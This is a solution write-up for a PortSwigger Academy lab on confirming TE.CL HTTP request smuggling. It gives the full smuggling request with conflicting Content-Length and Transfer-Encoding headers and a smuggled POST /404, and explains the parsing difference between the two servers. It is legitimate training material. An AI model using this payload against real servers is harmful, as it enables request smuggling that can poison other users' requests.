PortSwigger Academy Lab: HTTP request smuggling, confirming a TE.CL vulnerability via differential responses
Task
This lab involves a front-end and back-end server, and the back-end server doesn’t support chunked encoding.
To solve the lab, smuggle a request to the back-end server, so that a subsequent request for / (the web root) triggers a 404 Not Found response.
Solution
Send a request to Repeater. Change the protocol to HTML 1. Also change the request method. Turn off update content length. Show non-printable characters.
Craft a request to send:
POST / HTTP/1.1
Host: 0a12001c039286248178fc0f006300ee.web-security-academy.net
Content-Type: application/x-www-form-urlencoded Content-length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
Here 5e is the chunk size from POST to x=1. Trailing double CRLF (Carriage Return and Line Feed) /r/n/r/n after 0 is very important here as it marks the termination of the chunk. Without it the server will return an error.
The frontend server sees Transfer-Encoding and processes the data until x=1. However, the backend server sees Content-Length: 4 and only processes until 5e. The rest of the request will be considered a different request. And since that request’s content length is 15, the backend server will wait for more data.
So sending this request twice lets the server returns 404.